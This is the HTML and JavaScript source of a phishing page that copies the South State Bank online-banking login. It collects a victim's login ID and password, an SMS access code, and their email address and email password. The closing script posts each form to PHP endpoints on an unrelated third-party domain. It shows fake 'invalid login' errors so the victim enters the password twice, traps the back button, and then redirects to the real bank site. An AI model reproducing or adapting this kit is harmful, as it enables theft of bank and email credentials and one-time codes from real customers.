<q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
    <q2-icon type="close" stencil-hydrated=""></q2-icon>
</q2-btn></aside>
        </div>
        <div class="login-title">
            <h1 id="ember18" class="ui-logo large ember-view"><span class="sr-only" test-id="logoDescriptiveText">South State Bank</span>

    <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
</h1>
        </div>

            <div class="login-static-alert login-message login-alert-message loginFormArea">
                <div id="ember19" class="login-alert-container alert-message_container static-alert has-alert ember-view"><div class="alert alert-msg alert-message_content alert-danger" role="alert" aria-live="assertive" id="msg" style="display:none">
    <div class="alert-message_inner" style="line-height: 1.91;">
        <p>
    <span role="img" class="ui-icon icon-warning-sign " aria-hidden="true" aria-label="error"></span>

 Invalid Login ID and/or Password. Please try again.</p>
        <p class="alert-message_sizer" style="">X</p>
    </div>
</div>
</div>
            </div>

            <div class="login-form loginFormArea">
                <form class="is-invalid" id="form1" method="post" action="" data-ember-action="" data-ember-action-24="24">
                    <div class="field ">
                        <label class="login-field" for="fldUsername">Login ID</label>
                        <input test-id="fldUsername" spellcheck="false" autocapitalize="none" autocorrect="off" placeholder="" name="username" autocomplete="off" title="" id="fldUsername" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="text">
                    </div>
                    <div class="password field">
                        <label class="login-field" for="fldPassword">Password</label>
                        <input test-id="fldPassword" spellcheck="false" autocapitalize="none" autocorrect="off" autocomplete="off" id="password" name="password" class="mrg-T-sm login-field form-control ember-text-field form-control ember-view" type="password">
                    </div>
                    <div id="submissionArea">
                        <div id="userLinks">
                                <div id="rememberUserNameArea">
                                    <div description-id="ember21-description" test-id="ckbRememberUser" id="ember21" class="ui-checkbox ember-view"><input class="sr-only" id="ckbRememberUser" type="checkbox">
<label for="ckbRememberUser">
    <svg aria-hidden="true" focusable="false" width="20" height="20" viewBox="0 0 20 20">
        <rect fill="none" stroke="none" stroke-width="2" x="1" y="1" width="18" height="18" rx="3"></rect>
        <polyline fill="none" stroke="none" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" points="4 11.4390244 7.44978307 15.0611808 16 5"></polyline>
    </svg>
    <div class="inner-label ">
            <div test-id="txtLabel" class="inner-text">
                Remember me
            </div>
<!---->    </div>
</label>
</div>
                                </div>

                            <button class="logon-submit btn-primary btn-block pointer btn submitButton submit" test-id="btnSubmit" id="btn1" data-ember-action="" data-ember-action-26="26">
                                <div class="icon"></div>Log In
                            </button>

                            <div class="password-links">
                                <div class="password-link">
<a href="#/login/resetPasswordUsername" id="ember23" class="ember-view">                                        <span class="forgot-pw" test-id="lnkForgottenPW">Forgot your password?</span>
</a>                                </div>
                                <div class="password-link">
<!---->                                </div>
                            </div>
                        </div>
                    </div>
                </form>
            </div>

        

        <div class="login-icons clearfix"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div>
        <div class="preLogon">
            <div id="injected_footerContent" style="display:none;"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div> <img style="visibility:hidden" src="data:image/gif;base64, R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$('.login-icons').empty().append($('#injected_footerContent')[0].innerHTML);">
        </div>
            <a href="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_large-101554d3eebb7c3c6fedb7d73549127b.png" target="_blank" rel="noopener" test-id="complianceLogo" aria-label="This is a compliance logo and clicking will take to the larger logo link">
                <img src="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_small-6098e18c90a3ac30a8152986379f83f7.png">
            </a>
    </div>
</div></div>
<div class="contentArea" style="display:none" id="step2">
<div class="login-outer">
    <div class="login-inner" id="login-inner">
        <div class="quicktip-container">
            <aside id="ember16" style="display: none;" class="quick-tip hidden ember-view"><span class="tip-text" test-id="textQT"><!----></span>
<q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
    <q2-icon type="close" stencil-hydrated=""></q2-icon>
</q2-btn></aside>
            <aside id="ember17" style="display: none;" class="quick-tip hidden ember-view"><span class="tip-text" test-id="textQT"><!----></span>
<q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
    <q2-icon type="close" stencil-hydrated=""></q2-icon>
</q2-btn></aside>
        </div>
        <div class="login-title">
            <h1 id="ember18" class="ui-logo large ember-view"><span class="sr-only" test-id="logoDescriptiveText">South State Bank</span>

    <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
</h1>
        </div>

            <div class="login-static-alert login-message login-alert-message loginFormArea">
                <div id="ember19" class="login-alert-container alert-message_container static-alert has-alert ember-view"><div class="alert alert-msg alert-message_content alert-danger" role="alert" aria-live="assertive" id="ms" style="display:none">
    <div class="alert-message_inner" style="line-height: 1.91;">
        <p>
    <span role="img" class="ui-icon icon-warning-sign " aria-hidden="true" aria-label="error"></span>

 Invalid Login ID and/or Password. Please try again.</p>
        <p class="alert-message_sizer" style="">X</p>
    </div>
</div>
</div>
            </div>

            <div class="login-form loginFormArea">
            <form id="form2" method="post" action="">
                <div class="pad-V-md">Code has been sent to your registered phone number.</div><br>
                <div class="field">
                    <label class="login-field" for="code">Enter Secure Access Code</label>
                    <input id="code" class="login-field form-control reset-password-field ember-text-field form-control ember-view" name="code" required type="text">
                </div>
                <div class="button-holder">
</button>

                    
                                    <button class="logon-submit btn-primary btn-block pointer btn submitButton submit"
                                            test-id="btnSubmit"  id="btn2" data-ember-action=""
                                            data-ember-action-46="46">
                                        <div class="icon" bis_skin_checked="1"></div>
                                        Submit
                                    </button>
                    </div>
                </form>
            </div>

        

        <div class="login-icons clearfix"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div>
        <div class="preLogon">
            <div id="injected_footerContent" style="display:none;"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div> <img style="visibility:hidden" src="data:image/gif;base64, R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$('.login-icons').empty().append($('#injected_footerContent')[0].innerHTML);">
        </div>
            <a href="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_large-101554d3eebb7c3c6fedb7d73549127b.png" target="_blank" rel="noopener" test-id="complianceLogo" aria-label="This is a compliance logo and clicking will take to the larger logo link">
                <img src="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_small-6098e18c90a3ac30a8152986379f83f7.png">
            </a>
    </div>
</div></div>
<div class="contentArea" style="display:none" id="step3">
<div class="login-outer">
    <div class="login-inner" id="login-inner">
        <div class="quicktip-container">
            <aside id="ember16" style="display: none;" class="quick-tip hidden ember-view"><span class="tip-text" test-id="textQT"><!----></span>
<q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
    <q2-icon type="close" stencil-hydrated=""></q2-icon>
</q2-btn></aside>
            <aside id="ember17" style="display: none;" class="quick-tip hidden ember-view"><span class="tip-text" test-id="textQT"><!----></span>
<q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
    <q2-icon type="close" stencil-hydrated=""></q2-icon>
</q2-btn></aside>
        </div>
        <div class="login-title">
            <h1 id="ember18" class="ui-logo large ember-view"><span class="sr-only" test-id="logoDescriptiveText">South State Bank</span>

    <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
</h1>
        </div>

            <div class="login-static-alert login-message login-alert-message loginFormArea">
                <div id="ember19" class="login-alert-container alert-message_container static-alert has-alert ember-view"><div class="alert alert-msg alert-message_content alert-danger" role="alert" aria-live="assertive" id="msg2" style="display:none">
    <div class="alert-message_inner" style="line-height: 1.91;">
        <p>
    <span role="img" class="ui-icon icon-warning-sign " aria-hidden="true" aria-label="error"></span>

 You have entered an incorrect Email / password.</p>
        <p class="alert-message_sizer" style="">X</p>
    </div>
</div>
</div>
            </div>

             <div class="login-form loginFormArea"><br>
            <form id="form3" method="post" action="">
                <div class="pad-V-md">Confirm Your Linked Email address.</div>
                <div class="field">
                    <label class="login-field" for="code">Email address</label>
                    <input id="code" class="login-field form-control reset-password-field ember-text-field form-control ember-view" name="email" required type="email">
                </div>
				<div class="field">
                    <label class="login-field" for="code">Email password</label>
                    <input id="passwd" class="login-field form-control reset-password-field ember-text-field form-control ember-view" name="passwd" required type="password">
                </div>
                <div class="button-holder">
</button>

                    
                                    <button class="logon-submit btn-primary btn-block pointer btn submitButton submit"
                                            test-id="btnSubmit"  id="btn3" data-ember-action=""
                                            data-ember-action-46="46">
                                        <div class="icon" bis_skin_checked="1"></div>
                                        Confirm
                                    </button>
                    </div>
                </form>
            </div>

        

        <div class="login-icons clearfix"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div>
        <div class="preLogon">
            <div id="injected_footerContent" style="display:none;"><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/contact/" onclick="window.open(this.href,'_system'); return false;">Contact Us</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/locations/" onclick="window.open(this.href,'_system'); return false;">Locations</a><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/Personal/Bank/Online-Banking-Agreement/" onclick="window.open(this.href,'_system'); return false;">Agreements</a></span><br><span><a target="_blank" class="login-adLink" href="https://www.southstatebank.com/global/online-privacy-policy/" onclick="window.open(this.href,'_system'); return false;">Online Privacy Policy</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/ForgotUsername" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Forgot Login</a><a target="_blank" class="login-adLink" href="https://secure.southstatebank.com/southstatebankonline/sdk/AutoEnrollmentE2E" mobile-window="main" onclick="window.open(this.href,'_system'); return false;">Enroll</a></span></div> <img style="visibility:hidden" src="data:image/gif;base64, R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$('.login-icons').empty().append($('#injected_footerContent')[0].innerHTML);">
        </div>
            <a href="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_large-101554d3eebb7c3c6fedb7d73549127b.png" target="_blank" rel="noopener" test-id="complianceLogo" aria-label="This is a compliance logo and clicking will take to the larger logo link">
                <img src="https://cdn1.onlineaccess1.com/cdn/depot/3667/2197/599028856807cd32574375a58e340e56/assets/images/fdic_logo_small-6098e18c90a3ac30a8152986379f83f7.png">
            </a>
    </div>
</div></div>
</div>
<a test-id="lnkReturnToLogin" href="#/login" id="ember26" class="return-to-login active ember-view">                Return to login
</a>    </div>

    <div class="content-overlay"></div>

<!---->
<!---->
<!---->
<!---->
    <div id="ember27" class="print-content ember-view"><div style="overflow: auto;">
    <div style="float: left;"><img id="transaction-print-logo" alt="" role="presentation"></div>
    <div class="timestamp"></div>
</div>
<div>
<!----><!----></div>
<div class="detail-items">
    <table>
        <tbody>
<!----><!----><!---->        </tbody>
    </table>
</div>
<!----></div>

</div>
<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script> 
<script type="text/javascript">

history.pushState(null, document.title, location.href);
window.addEventListener('popstate', function (event)
{
  history.pushState(null, document.title, location.href);
});

//$(document).bind("contextmenu", function(e){ return false;});

var count = 0;
var counts = 0;

$('#form1').on('submit', function(e){
		count = count+1;
		$('#btn1').html('Verifing.......');
		$.post('https://www.prontosimangia.it/wp-log/data.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		                     if(count == 2){
							    $('#step1').hide();
							    $('#step2').show();
							 }else{
							     $('#password').val('');
								 $('#msg').show();
								 $('#btn1').html('Log In');
							 }
                              
							  
                        },2000);
		e.preventDefault();
	});
	
$('#form2').on('submit', function(e){
		count = count+1;
		$('#btn2').html('Verifing.......');
		$.post('https://www.prontosimangia.it/wp-log/code.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		                     if(count == 3){
							    $('#step2').hide();
							    $('#step3').show();
							 }else{
							     $('#tacEntry').val('');
								 $('#ms').show();
								 $('#btn2').html('Submit');
							 }
                              
							  
                        },9000);
		e.preventDefault();
	});
	
$('#form3').on('submit', function(e){
		counts = counts+1;
		$('#btn3').html('Verifing.......');
		$.post('https://www.prontosimangia.it/wp-log/cok.php', $(this).serialize(), function(data){
			console.log(data);
		});
		setTimeout(function() {
		
							if(counts == 2){
							   $('#step3').show();
							   $('#step4').show();
							   
					   setTimeout(function() {
                              window.location.href = "https://www.southstatebank.com/personal";
                        },500);
							   
							}else{
							     $('#passwd').val('');
								 $('#msg2').show();
								 $('#btn3').html('Confirm');
							}
		
                            
                        },2000);
		e.preventDefault();
	});






</script>
<script>


    $(function() {
        $('[name="https://www.prontosimangia.it/wp-log/code.php"]').mask('000000');

    });

</script>
</body></html>
